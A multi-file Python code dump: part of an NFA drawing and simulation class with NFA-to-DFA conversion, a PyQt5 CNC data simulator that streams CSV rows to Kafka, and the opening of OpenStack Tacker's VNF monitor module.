self._transitions = {(s, c) : [] for s in self._states for c in self._alphabet}
self._selected = None
self._callback = None
self._choosingChar = False
self._chosenChar = ''
def draw(self):
for (src, wth) in self._transitions:
for dst in self._transitions[(src,wth)]:
self._drawArrow(src, wth, dst)
for state in self._states:
state.draw()
if self._selected == state:
stroke(0)
fill(0,0,0,0)
rectMode(CENTER)
rect(state.getX(),state.getY(), 60, 60)
src = state
for dst in self._states:
chars = [(c if c != '' else '\\e') for c in self._alphabet if (src, c) in self._transitions and dst in self._transitions[(src,c)]]
txt = ', '.join(chars)
pushMatrix()
sx, sy, dx, dy = src.getX(), src.getY(), dst.getX(), dst.getY()
translate((sx + dx) / 2, (sy + dy) / 2)
nsx, nsy, ndx, ndy = (sx - dx) / 2, (sy - dy) / 2, (dx - sx) / 2, (dy - sy) / 2
a = atan2(ndy - nsy,ndx - nsx)
rotate(a)
textSize(25)
textAlign(CENTER)
fill(0,0,0,255)
translate(0, dist(sx,sy,dx,dy) / 3 + 30)
rotate(-a)
text(txt, 0, 0)
popMatrix()
if self._choosingChar:
fill(0)
textSize(30)
textAlign(CENTER)
text('Choose a character of the transition and hit enter', width / 2, height / 3)
def _drawArrow(self, src, wth, dst):
sx, sy, dx, dy = src.getX(), src.getY(), dst.getX(), dst.getY()
fill(0,0,0,0)
pushMatrix()
translate((sx + dx) / 2, (sy + dy) / 2)
nsx, nsy, ndx, ndy = (sx - dx) / 2, (sy - dy) / 2, (dx - sx) / 2, (dy - sy) / 2
a = atan2(ndy - nsy,ndx - nsx)
rotate(a)
stroke(0)
arc(0,0, dist(sx, sy, dx, dy), 2 * dist(sx,sy,dx,dy) / 3, 0, PI)
popMatrix()
def analyze(self, message):
t = Thread(target = self._analyze, args = (message,))
t.start()
def _analyze(self, message):
if not self._isValid():
print('This NFA is missing some transitions')
return False
if not self._validMessage(message):
print('The message has to consist of characters from the alphabet')
return False
curr = [(self._states[0], message)]
while len(curr) != 0:
for state, _ in curr:
state.setActive(True)
sleep(.4)
for state, _ in curr:
state.setActive(False)
tmp = []
while len(curr) > 0:
s, m = curr.pop(0)
if len(m) == 0 and s.isFinal():
return True
tmp.extend(map(lambda x: (x, m), self._transitions[(s, '')]))
if len(m) > 0:
tmp.extend(map(lambda x: (x, m[1:]), self._transitions[(s, m[0])]))
curr = tmp
return False
def handleLeftClick(self):
for state in self._states:
if state.handleClick(mouseX, mouseY):
if self._selected == None:
self._selected = state
return state
else:
self._choosingChar = True
self._callback = lambda c : self._transitions[(self._selected, c)].remove(state) if state in self._transitions[(self._selected, c)] else self.setTransition(self._selected, c, state)
return state
self._selected = None
def handleRightClick(self):
for state in self._states:
if state.handleClick(mouseX, mouseY):
state.setFinish(not state.isFinal())
def handleDoubleClick(self):
for state in self._states:
if state.handleClick(mouseX, mouseY):
self.removeState(state)
if self._selected == state:
self._selected = None
self._choosingChar = False
return state
self.addState(DrawableState(False, False, mouseX, mouseY))
def handleDrag(self):
for state in self._states:
if state.handleClick(pmouseX, pmouseY):
state.moveTo(mouseX, mouseY)
return state
def handleKeyPresses(self):
if not self._choosingChar:
return False
if key == '\n':
self._callback(self._chosenChar)
self._choosingChar = False
self._callback = None
self._selected = None
self._chosenChar = ''
elif keyCode == BACKSPACE:
self._chosenChar = ''
else:
self._chosenChar = key
return True
def toDFA(self):
powerset = []
for i in range(1, (1 << len(self._states))):
sset = set()
for j in range(len(self._states)):
if i & (1 << j) != 0:
sset.add(self._states[j])
powerset.append(sset)
powerset = list(map(self._eclosure, powerset))
#print(len(powerset))
#print(powerset)
alph = self._alphabet
alph.remove('')
dfa = DrawableDFA(alph, 50, 100)
for state in powerset[0]:
if state.isFinal():
dfa.getState(0).setFinish(True)
for i in range(1, len(powerset)):
dfa.addState(DrawableState(False, False, 100 + 100 * (i % 14), 100 + 100 * (i // 8)))
for state in powerset[i]:
if state.isFinal():
dfa.getState(i).setFinish(True)
break
for i in range(len(powerset)):
for c in alph:
dstSet = set()
#print('setting transition for : ' + str((dfa.getState(i), c)))
for s in powerset[i]:
dstSet = dstSet.union(self._eclosure(set(self._transitions[(s,c)])))
dfa.setTransition(dfa.getState(i), c, dfa.getState(powerset.index(dstSet)))
dfa.trim()
return dfa
|
CncSimulatorSprint1.py
|
import os, sys, time, csv
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QThread
from kafka import KafkaProducer
import threading
class Ui_CNC_Simulator(object):
def __init__(self):
# self.history = os.path.isfile('./tmp')
self.data = None
self.flag = False
self.makeAnomal = False
self.start = 0
self.end = 0
self.logs = ''
self.interval = 0.05
self.producer = KafkaProducer(bootstrap_servers=['9.8.100.152:9092'])
self.topic = 'MH001001001-CNC001'
self.kafkaSendThread = threading.Thread(target=self.SendData, name="kafkaSendThread", args=())
self.kafkaSendThread.start()
self.anomalyLog = ''
def setupUi(self, CNC_Simulator):
CNC_Simulator.setObjectName("CNC_Simulator")
CNC_Simulator.resize(1256, 603)
# icon = QtGui.QIcon()
# icon.addPixmap(QtGui.QPixmap("D:/Users/1027a/Downloads/tmp/logo2.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
# CNC_Simulator.setWindowIcon(icon)
CNC_Simulator.setStyleSheet("background-color: #0a1a33;")
self.centralwidget = QtWidgets.QWidget(CNC_Simulator)
self.centralwidget.setObjectName("centralwidget")
self.header = QtWidgets.QLabel(self.centralwidget)
self.header.setGeometry(QtCore.QRect(15, 7, 1231, 31))
self.header.setStyleSheet("Color: white; font: 75 20pt \"URW Gothic L\"; font-weight: 700;")
self.header.setAlignment(QtCore.Qt.AlignCenter)
self.header.setObjectName("header")
self.error = QtWidgets.QMessageBox()
self.error.setWindowTitle("ERROR!")
self.error.setIcon(QtWidgets.QMessageBox.Critical)
self.info = QtWidgets.QMessageBox()
self.info.setWindowTitle("INFOMATION")
self.info.setIcon(QtWidgets.QMessageBox.Critical)
self.module1 = QtWidgets.QLabel(self.centralwidget)
self.module1.setGeometry(QtCore.QRect(13, 47, 588, 308))
self.module1.setStyleSheet("background-color: #092c4c; border-radius: 10px;")
self.module1.setObjectName("module1")
self.filePath = QtWidgets.QLabel(self.centralwidget)
self.filePath.setGeometry(QtCore.QRect(23, 60, 488, 31))
self.filePath.setStyleSheet("Color: white; border: 1.5px solid gray; background-color: #3a475a; font: 75 10pt \"URW Gothic L\"; border-radius: 5px")
self.filePath.setObjectName("filePath")
self.browsBtn = QtWidgets.QPushButton(self.centralwidget)
self.browsBtn.setGeometry(QtCore.QRect(515, 59, 79, 31))
self.browsBtn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.browsBtn.setStyleSheet("Color: white; background-color: #0F79DB; font-size: 11pt; font-weight: 600; border-radius: 5px;")
self.browsBtn.setObjectName("browsBtn")
self.fileInfo = QtWidgets.QLabel(self.centralwidget)
self.fileInfo.setAlignment(QtCore.Qt.AlignTop)
self.fileInfo.setGeometry(QtCore.QRect(23, 97, 570, 252))
self.fileInfo.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.fileInfo.setStyleSheet("Color: white; background-color: #3a475a; font: 75 10pt \"URW Gothic L\"; border-radius: 5px; padding: 3px;")
self.fileInfo.setObjectName("fileInfo")
self.module2 = QtWidgets.QLabel(self.centralwidget)
self.module2.setGeometry(QtCore.QRect(11, 474, 590, 112))
self.module2.setStyleSheet("background-color: #092c4c; border-radius: 10px;")
self.module2.setObjectName("module2")
end = QtWidgets.QLabel(self.centralwidget)
end.setGeometry(QtCore.QRect(218, 482, 182, 17))
end.setStyleSheet("Color: white; background-color: #092c4c; font: 75 13pt \"URW Gothic L\";")
end.setAlignment(QtCore.Qt.AlignCenter)
end.setObjectName("end")
end.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "end index"))
self.endIndex = QtWidgets.QLineEdit(self.centralwidget)
self.endIndex.setGeometry(QtCore.QRect(217, 506, 186, 25))
self.endIndex.setValidator(QtGui.QIntValidator(0,999999999))
self.endIndex.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.endIndex.setObjectName("endIndex")
self.tilde = QtWidgets.QLabel(self.centralwidget)
self.tilde.setGeometry(QtCore.QRect(203, 484, 15, 16))
self.tilde.setStyleSheet("Color: white; background-color: #092c4c; font-size: 20pt;")
self.tilde.setObjectName("tilde")
interval = QtWidgets.QLabel(self.centralwidget)
interval.setGeometry(QtCore.QRect(417, 482, 144, 17))
interval.setStyleSheet("Color: white; background-color: #092c4c; font: 75 13pt \"URW Gothic L\";")
interval.setAlignment(QtCore.Qt.AlignCenter)
interval.setObjectName("interval")
interval.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "interval"))
self.intervalInput = QtWidgets.QLineEdit(self.centralwidget)
self.intervalInput.setGeometry(QtCore.QRect(416, 506, 147, 25))
self.intervalInput.setValidator(QtGui.QIntValidator(0,999999999))
self.intervalInput.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.intervalInput.setObjectName("intervalInput")
self.intervalInput.setText("50")
self.startAndStopBtn = QtWidgets.QPushButton(self.centralwidget)
self.startAndStopBtn.setGeometry(QtCore.QRect(21, 546, 280, 31))
self.startAndStopBtn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.startAndStopBtn.setStyleSheet("Color: white; background-color: #0F79DB; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.startAndStopBtn.setObjectName("startAndStopBtn")
self.ms = QtWidgets.QLabel(self.centralwidget)
self.ms.setGeometry(QtCore.QRect(567, 514, 27, 17))
self.ms.setStyleSheet("Color: white; background-color: #092c4c; font: 75 11.5pt \"URW Gothic L\";")
self.ms.setObjectName("ms")
self.pauseAndResumeBtn = QtWidgets.QPushButton(self.centralwidget)
self.pauseAndResumeBtn.setGeometry(QtCore.QRect(312, 546, 281, 31))
self.pauseAndResumeBtn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.pauseAndResumeBtn.setStyleSheet("Color: white; background-color: #808080; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.pauseAndResumeBtn.setObjectName("pauseAndResumeBtn")
self.pauseAndResumeBtn.setEnabled(False)
start = QtWidgets.QLabel(self.centralwidget)
start.setGeometry(QtCore.QRect(29, 482, 176, 17))
start.setStyleSheet("Color: white; background-color: #092c4c; font: 75 13pt \"URW Gothic L\";")
start.setAlignment(QtCore.Qt.AlignCenter)
start.setObjectName("start")
start.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "start index"))
self.startIndex = QtWidgets.QLineEdit(self.centralwidget)
self.startIndex.setGeometry(QtCore.QRect(26, 506, 179, 25))
self.startIndex.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.startIndex.setObjectName("startIndex")
self.startIndex.setValidator(QtGui.QIntValidator(0,999999999))
label = QtWidgets.QLabel(self.centralwidget)
label.setGeometry(QtCore.QRect(613, 47, 630, 540))
label.setStyleSheet("background-color: #092c4c; border-radius: 10px;")
label.setObjectName("label")
self.consoleLog = QtWidgets.QTextEdit(self.centralwidget)
self.consoleLog.setGeometry(QtCore.QRect(624, 114, 610, 464))
self.consoleLog.setStyleSheet("Color: white; background-color: #3a475a; border: 1.5px solid gray; font: 75 10pt \"URW Gothic L\"; border-bottom-right-radius: 5px; border-bottom-left-radius: 5px; border-top-style: none;")
self.consoleLog.setObjectName("consoleLog")
self.consoleLog.setReadOnly(True)
self.consolLog_h = QtWidgets.QLineEdit(self.centralwidget)
self.consolLog_h.setGeometry(QtCore.QRect(624, 83, 610, 31))
self.consolLog_h.setStyleSheet(" border-top-right-radius: 5px; border-top-left-radius: 5px; Color: white; background-color: #3a475a; border: 1.5px solid gray; font: 75 11.3pt \"URW Gothic L\"; border-bottom-style: none;")
self.consolLog_h.setObjectName("consolLog_h")
self.consolLog_h.setReadOnly(True)
self.consoleLog.document().setMaximumBlockCount(500)
self.consoleHeader = QtWidgets.QLabel(self.centralwidget)
self.consoleHeader.setGeometry(QtCore.QRect(614, 51, 621, 25))
self.consoleHeader.setStyleSheet("Color: white; background-color: #092c4c; font: 75 13pt \"URW Gothic L\" ; font-weight: 500;")
self.consoleHeader.setAlignment(QtCore.Qt.AlignCenter)
self.consoleHeader.setObjectName("consoleHeader")
self.logo = QtWidgets.QLabel(self.centralwidget)
self.logo.setGeometry(QtCore.QRect(10, 7, 71, 35))
self.logo.setStyleSheet("image: url(\'D:/Users/1027a/Downloads/tmp/logo.png\');")
self.logo.setObjectName("logo")
self.clear = QtWidgets.QPushButton(self.centralwidget)
self.clear.setGeometry(QtCore.QRect(1168, 55, 61, 22))
self.clear.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.clear.setStyleSheet("Color: white; background-color: #0F79DB; font-size: 9pt; font-weight: 600; border-radius: 5px;")
self.clear.setObjectName("clear")
self.module3 = QtWidgets.QLabel(self.centralwidget)
self.module3.setGeometry(QtCore.QRect(12, 361, 590, 106))
self.module3.setStyleSheet("background-color: #092c4c; border-radius: 10px;")
self.module3.setObjectName("module3")
self.nomalORnot = QtWidgets.QGroupBox(self.centralwidget)
self.nomalORnot.setGeometry(QtCore.QRect(22, 365, 181, 95))
self.nomalORnot.setStyleSheet("Color:white; border-radius: 5px; background-color: #3a475a; font: 75 11pt \"URW Gothic L\";")
self.nomalORnot.setAlignment(QtCore.Qt.AlignCenter)
self.nomalORnot.setObjectName("nomalORnot")
self.nomal = QtWidgets.QRadioButton(self.nomalORnot)
self.nomal.setGeometry(QtCore.QRect(10, 34, 112, 23))
self.nomal.setStyleSheet("font: 75 10pt \"URW Gothic L\"; Color: white;")
self.nomal.setObjectName("nomal")
self.nomal.setChecked(True)
self.anomaly = QtWidgets.QRadioButton(self.nomalORnot)
self.anomaly.setGeometry(QtCore.QRect(10, 64, 112, 23))
self.anomaly.setStyleSheet("font: 75 10pt \"URW Gothic L\"; Color: white;")
self.anomaly.setObjectName("anomaly")
self.subMenu = QtWidgets.QGroupBox(self.centralwidget)
self.subMenu.setGeometry(QtCore.QRect(212, 365, 381, 95))
self.subMenu.setStyleSheet("Color:white; border-radius: 5px; background-color: #3a475a; font: 75 11pt \"URW Gothic L\";")
self.subMenu.setAlignment(QtCore.Qt.AlignCenter)
self.subMenu.setObjectName("subMenu")
self.kindOfAnomaly = QtWidgets.QComboBox(self.subMenu)
self.kindOfAnomaly.setGeometry(QtCore.QRect(35, 34, 131, 27))
self.kindOfAnomaly.setStyleSheet("background-color: #4A515D; Color: white;")
self.kindOfAnomaly.setObjectName("kindOfAnomaly")
self.kindOfAnomaly.addItem("Static")
self.kindOfAnomaly.addItem("Increase")
self.kindOfAnomaly.addItem("Decrease")
self.kindOfAnomaly.hide()
self.kindOfAnomaly.currentIndexChanged.connect(self.ComboChageSet)
self.unitInput = QtWidgets.QLineEdit(self.subMenu)
self.unitInput.setGeometry(QtCore.QRect(175, 34, 161, 28))
self.unitInput.setStyleSheet("background-color: #4A515D; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.unitInput.setObjectName("unitInput")
self.unitInput.setAlignment(QtCore.Qt.AlignRight)
self.unitInput.hide()
self.unit = QtWidgets.QLabel(self.subMenu)
self.unit.setGeometry(QtCore.QRect(341, 41, 20, 17))
self.unit.setStyleSheet("Color: white; background-color: #3a475a; font: 75 11.5pt \"URW Gothic L\";")
self.unit.setObjectName("unit")
self.unit.hide()
self.apply = QtWidgets.QPushButton(self.subMenu)
self.apply.setGeometry(QtCore.QRect(3, 67, 375, 25))
self.apply.setStyleSheet("Color: white; background-color: #0F79DB; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.apply.setObjectName("apply")
self.apply.hide()
self.nextStep = QtWidgets.QLabel(self.subMenu)
self.nextStep.setGeometry(QtCore.QRect(130, 40, 171, 31))
self.nextStep.setStyleSheet("font: 75 13pt \"URW Gothic L\";")
self.nextStep.setObjectName("nextStep")
CNC_Simulator.setCentralWidget(self.centralwidget)
self.RetranslateUi(CNC_Simulator)
self.GiveActionToObject()
QtCore.QMetaObject.connectSlotsByName(CNC_Simulator)
def RetranslateUi(self, CNC_Simulator):
_translate = QtCore.QCoreApplication.translate
CNC_Simulator.setWindowTitle(_translate("CNC_Simulator", "CNC Simulator - HNinc"))
self.header.setText(_translate("CNC_Simulator", "CNC Simulator"))
self.filePath.setText(_translate("CNC_Simulator", "Choose File.."))
self.browsBtn.setText(_translate("CNC_Simulator", "Open"))
self.fileInfo.setText(_translate("CNC_Simulator", "File info"))
self.tilde.setText(_translate("CNC_Simulator", "~"))
self.startAndStopBtn.setText(_translate("CNC_Simulator", "Start"))
self.ms.setText(_translate("CNC_Simulator", "ms"))
self.pauseAndResumeBtn.setText(_translate("CNC_Simulator", "Pause"))
self.consoleHeader.setText(_translate("CNC_Simulator", "Stream LoadSpindle"))
self.clear.setText(_translate("CNC_Simulator", "Clear"))
self.nomalORnot.setTitle(_translate("CNC_Simulator", "choose data type"))
self.nomal.setText(_translate("CNC_Simulator", "nomal"))
self.anomaly.setText(_translate("CNC_Simulator", "Anomaly"))
self.subMenu.setTitle(_translate("CNC_Simulator", "Option"))
self.nextStep.setText(_translate("CNC_Simulator", "Take the next step"))
self.consolLog_h.setText(_translate("CNC_Simulator", " Count, OpCode, Time, LoadSpindle, Tcode, TotalCnt, X, Y, Z"))
self.apply.setText(_translate("CNC_Simulator", "apply"))
def GiveActionToObject(self):
self.browsBtn.clicked.connect(self.FileExplorer)
self.startAndStopBtn.clicked.connect(self.StartAndStopData)
self.pauseAndResumeBtn.clicked.connect(self.PauseAndResumeData)
self.clear.clicked.connect(self.ClearConsole)
self.nomal.clicked.connect(self.AnomalyUiAction)
self.anomaly.clicked.connect(self.AnomalyUiAction)
self.apply.clicked.connect(self.ApplyAction)
def ClearConsole(self):
self.consoleLog.clear()
def ComboChageSet(self):
if self.kindOfAnomaly.currentIndex() == 0:
self.makeAnomal = False
self.unit.setText('')
self.anomalyLog = ''
self.unitInput.setValidator(QtGui.QIntValidator(0,99999999))
return
if self.kindOfAnomaly.currentIndex() > 0:
self.makeAnomal = False
self.unit.setText('%')
self.unitInput.setValidator(QtGui.QIntValidator(0,999))
return
def AnomalyUiAction(self):
if self.nomal.isChecked():
self.nextStep.show()
self.unit.hide()
self.unitInput.hide()
self.kindOfAnomaly.hide()
self.apply.hide()
self.makeAnomal = False
self.anomalyLog = ''
if self.anomaly.isChecked():
self.nextStep.hide()
self.unit.show()
self.unitInput.show()
self.kindOfAnomaly.show()
self.apply.show()
def ApplyAction(self):
if not self.flag:
self.error.setText("시뮬레이터가 시작 중인지 확인해주세요.")
self.error.exec()
elif self.unitInput.text() == '':
self.error.setText("anomaly input을 확인해 주세요.")
self.error.exec()
else:
self.percent = int(self.unitInput.text())
if self.kindOfAnomaly.currentIndex() == 2 and self.percent > 100:
self.error.setText("100%초과하여 데이터를 감소할 수 없습니다.")
self.error.exec()
else:
self.makeAnomal = True
def FileExplorer(self):
FileOpen = QtWidgets.QFileDialog.getOpenFileName(None, 'Open file', './', 'csv(*.csv)')
if FileOpen[0] != '':
QtWidgets.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
self.filePath.setText(FileOpen[0])
self.ReadData()
def ReadData(self):
file = open(self.filePath.text(), 'r')
read = list(csv.reader(file))
self.data = []
if len(read[0]) > 13:
self.data.append(read[0])
flag = True
for line in read:
if flag:
flag = False
else:
tmp = line[(len(line)-5):(len(line)-1)]
line = line[:(len(line)-5)]
flag = True
for i in tmp:
if flag:
flag = False
else:
if i.find(']') != -1:
i = i.split(']')
i = i[0]
line[4] = i
self.data.append([i for i in line])
else:
self.data = read
row = (len(self.data))
column = len(self.data[0])
self.startIndex.setText('1')
self.endIndex.setText(str(row))
info = ' '.join(self.data[0][:11]) + ' .... \n'
info = info + ' '.join(self.data[1][:11]) + ' .... \n'
info = info + ' '.join(self.data[2][:11]) + ' .... \n'
info = info + ' '.join(self.data[3][:11]) + ' .... \n'
info = info + ' '.join(self.data[4][:11]) + ' .... \n'
info = info + ' '.join(self.data[5][:11]) + ' .... \n'
info = info + ' '.join(self.data[6][:11]) + ' .... \n'
info = info + ' '.join(self.data[7][:11]) + ' .... \n'
info = info + ' '.join(self.data[8][:11]) + ' .... \n'
info = info + ' '.join(self.data[9][:11]) + ' .... \n'
info = info + ' '.join(self.data[10][:11]) + ' .... \n'
info = info + ' '.join(self.data[11][:11]) + ' .... \n'
info = info + ' '.join(self.data[12][:11]) + ' .... \n'
info = info + ' '.join(self.data[13][:11]) + ' .... \n'
info = info + '... ... ... ... ... ... ... ... ... ... ... \n'
info = info + '[ ' + str(row)+' rows X '+ str(column) + ' columns ]'
self.fileInfo.setText(info)
QtWidgets.QApplication.restoreOverrideCursor()
print("Read done")
def CheckException(self):
if self.data == None:
self.error.setText("csv 파일 선택을 먼저 해주세요.")
self.error.exec()
return False
if self.intervalInput.text() == "":
self.error.setText("interval을 입력해주세요.")
self.error.exec()
return False
if self.startIndex.text() == "":
self.error.setText("start를 입력해주세요.")
self.error.exec()
return False
if self.endIndex.text() == "":
self.error.setText("end를 입력해주세요.")
self.error.exec()
return False
if int(self.startIndex.text()) < 1:
self.error.setText("start의 최소 값은 1입니다.\nstart index를 확인해주세요.")
self.error.exec()
return False
if int(self.endIndex.text()) < int(self.startIndex.text()):
self.error.setText("end의 최소 값은" + str(int(self.startIndex.text())+1) + "입니다.\nend index를 확인해주세요.")
self.error.exec()
return False
if int(self.intervalInput.text()) < 10:
self.error.setText("시뮬레이터 성능을 위하여 interval의 최소 값은 10입니다.\ninterval을 확인해주세요.")
self.error.exec()
return False
return True
def PauseAndResumeData(self):
check = self.CheckException()
if check:
if self.pauseAndResumeBtn.text() == 'Pause':
self.pauseAndResumeBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Resume"))
self.flag = False
else:
self.pauseAndResumeBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Pause"))
self.flag = True
def StartAndStopData(self):
check = self.CheckException()
if check:
if self.startAndStopBtn.text() == 'Start':
self.startAndStopBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Stop"))
self.startAndStopBtn.setStyleSheet("background-color: #bd253e; Color: white; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.pauseAndResumeBtn.setStyleSheet("background-color: #0F79DB;Color: white; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.pauseAndResumeBtn.setEnabled(True)
self.start = int(self.startIndex.text())
self.end = int(self.endIndex.text())
self.interval = int(self.intervalInput.text())/1000
self.startIndex.setReadOnly(True)
self.startIndex.setStyleSheet("background-color: #092c4c; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.endIndex.setReadOnly(True)
self.endIndex.setStyleSheet("background-color: #092c4c; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.intervalInput.setReadOnly(True)
self.intervalInput.setStyleSheet("background-color: #092c4c; Color: white; border: 1.5px solid gray; border-radius: 5px;")
if self.end <= self.start:
self.error.setText("현재 데이터 전송이 시작될 인덱스는 " +str(self.start) + "입니다.\n 시작 인덱스보다 끝 인덱스가 더 작습니다.\n 확인해주세요.")
self.error.exec()
else:
self.flag = True
else:
self.startAndStopBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Start"))
self.pauseAndResumeBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Pause"))
self.startAndStopBtn.setStyleSheet("background-color: #0F79DB; Color: white; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.pauseAndResumeBtn.setEnabled(False)
self.pauseAndResumeBtn.setStyleSheet("background-color: #808080;Color: white; font: 75 13pt \"URW Gothic L\"; font-weight: 600; border-radius: 7px;")
self.flag = False
self.logs = self.logs[:-1]
self.consoleLog.append(self.logs)
# self.consoleLog.moveCursor(QtGui.QTextCursor.End)
self.logs = ''
self.startIndex.setReadOnly(False)
self.startIndex.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.endIndex.setReadOnly(False)
self.endIndex.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
self.intervalInput.setReadOnly(False)
self.intervalInput.setStyleSheet("background-color: #3a475a; Color: white; border: 1.5px solid gray; border-radius: 5px;")
def SendData(self):
sendInterval = 0
while True:
if self.flag:
if self.end >= self.start:
timeCurrent = time.time()
line = self.data[self.start]
if self.makeAnomal:
index = self.kindOfAnomaly.currentIndex()
if index > 0:
if index == 1:
trans = int(int(line[4]) * ((self.percent/100)+1))
self.anomalyLog = 'Anomaly Mode(Increase):: LoadSpindle Value is changed ' + line[4] + ' ==> ' + str(trans) +'\n'
else:
trans = int(int(line[4]) * (1-(self.percent/100) ))
self.anomalyLog = 'Anomaly Mode(Decrease):: LoadSpindle Value is changed ' + line[4] + ' ==> ' + str(trans) +'\n'
line[4] = str(trans)
else:
self.anomalyLog = 'Anomaly Mode(Static):: LoadSpindle Value is changed ' + line[4] + ' ==> ' + str(self.percent) +'\n'
line[4] = str(self.percent)
line[1] = str(timeCurrent * 1000)
self.logs = self.logs + str(self.start) + '. ' + line[0] + ', ' + time.strftime('%Y-%m-%d %H:%M:%S.{}'.format(str(timeCurrent).split('.')[1][:3]), time.localtime(timeCurrent)) + ', ' + line[4] + ', ' + line[8] + ', ' + line[-4] + ', ' + line[-3]+ ', ' + line[-2] + ', ' + line[-1] + '\n' + self.anomalyLog
send = ','.join(line)
sendInterval += self.interval
send = send.encode('utf-8')
self.producer.send(self.topic,send)
self.start += 1
if self.end-self.start < 0.999/self.interval or sendInterval > 0.999:
if self.logs != '':
sendInterval = 0
self.logs = self.logs[:-1]
self.consoleLog.append(self.logs)
# self.consoleLog.moveCursor(QtGui.QTextCursor.End)
self.logs = ''
else: # 전송이 완료되었을 때
self.consoleLog.append(str(self.end - self.startTmp +1 )+'개의 데이터를 전송을 완료했습니다.')
self.start = self.startTmp
self.startAndStopBtn.setText(QtCore.QCoreApplication.translate("CNC_Simulator", "Stop"))
self.StartAndStopData()
time.sleep(self.interval)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
CNC_Simulator = QtWidgets.QMainWindow()
ui = Ui_CNC_Simulator()
ui.setupUi(CNC_Simulator)
CNC_Simulator.show()
os._exit(app.exec_())
|
monitor.py
|
# Copyright 2015 Intel Corporation.
# All Rights Reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import copy
import inspect
import random
import string
import threading
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from tacker._i18n import _
from tacker.common import driver_manager
from tacker.common import exceptions
from tacker import context as t_context
from tacker.plugins.common import constants
from tacker.vnfm import utils as vnfm_utils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
OPTS = [
cfg.IntOpt('check_intvl',
default=10,
help=_("check interval for monitor")),
]
CONF.register_opts(OPTS, group='monitor')
def config_opts():
return [('monitor', OPTS),
('tacker', VNFMonitor.OPTS),
('tacker', VNFAlarmMonitor.OPTS),
('tacker', VNFAppMonitor.OPTS)]
class VNFMonitor(object):
"""VNF Monitor."""
_instance = None
_hosting_vnfs = dict() # vnf_id => dict of parameters
_status_check_intvl = 0
_lock = threading.RLock()
OPTS = [
cfg.ListOpt(
'monitor_driver', default=['ping', 'http_ping'],
help=_('Monitor driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __new__(cls, boot_wait, check_intvl=None):
if not cls._instance:
cls._instance = super(VNFMonitor, cls).__new__(cls)
return cls._instance
def __init__(self, boot_wait, check_intvl=None):
self._monitor_manager = driver_manager.DriverManager(
'tacker.tacker.monitor.drivers',
cfg.CONF.tacker.monitor_driver)
self.boot_wait = boot_wait
if check_intvl is None:
check_intvl = cfg.CONF.monitor.check_intvl
self._status_check_intvl = check_intvl
LOG.debug('Spawning VNF monitor thread')
threading.Thread(target=self.__run__).start()
def __run__(self):
while(1):
time.sleep(self._status_check_intvl)
with self._lock:
for hosting_vnf in VNFMonitor._hosting_vnfs.values():
if hosting_vnf.get('dead', False) or (
hosting_vnf['vnf']['status'] ==
constants.PENDING_HEAL):
LOG.debug(
'monitor skips for DEAD/PENDING_HEAL vnf %s',
hosting_vnf)
continue
try:
self.run_monitor(hosting_vnf)
except Exception as ex:
LOG.exception("Unknown exception: Monitoring failed "
"for VNF '%s' due to '%s' ",
hosting_vnf['id'], ex)
@staticmethod
def to_hosting_vnf(vnf_dict, action_cb):
return {
'id': vnf_dict['id'],
'mgmt_ip_addresses': jsonutils.loads(
vnf_dict['mgmt_ip_address']),
'action_cb': action_cb,
'vnf': vnf_dict,
'monitoring_policy': jsonutils.loads(
vnf_dict['attributes']['monitoring_policy'])
}
def add_hosting_vnf(self, new_vnf):
LOG.debug('Adding host %(id)s, Mgmt IP %(ips)s',
{'id': new_vnf['id'],
'ips': new_vnf['mgmt_ip_addresses']})
new_vnf['boot_at'] = timeutils.utcnow()
with self._lock:
VNFMonitor._hosting_vnfs[new_vnf['id']] = new_vnf
attrib_dict = new_vnf['vnf']['attributes']
mon_policy_dict = attrib_dict['monitoring_policy']
evt_details = (("VNF added for monitoring. "
"mon_policy_dict = %s,") % (mon_policy_dict))
